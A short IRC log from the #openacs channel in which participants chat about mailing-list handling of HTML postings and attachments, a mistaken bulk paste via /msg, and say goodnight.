davb has quit 22:28:19 jerryasher has quit 22:35:45 vinod has quit 22:37:18 markd2 has joined #openacs 22:42:42 heh. Dude at SuSE called me a BOFH 22:43:35 why? 22:44:12 I suggested to the mailing folks to automatically kill postings that were all in HTML 22:44:30 when they were soliciting advice on what to do about attachments 22:45:25 * rbm agrees with markd2 22:45:32 you 22:45:38 you're a real BOFH too :-) 22:45:48 listar does a very good job of dealing with attachments 22:48:30 hazmat has quit 22:49:39 davb: grr. I didn't realize it was impossible to paste big chunks of text with /msg... sorry about the pollution folks:-/ 22:50:01 ola: create a private channel for that 22:50:09 ola: np. 22:50:29 rbm: how? 22:50:38 I know where the errant file is :) 22:50:49 :-) 22:51:50 * davb_ goes to clean the house. bbl 22:52:05 bye Dave 22:54:26 good night folks. 22:54:34 ola has quit 23:19:03 markd2 has quit 23:53:50 til_ has quit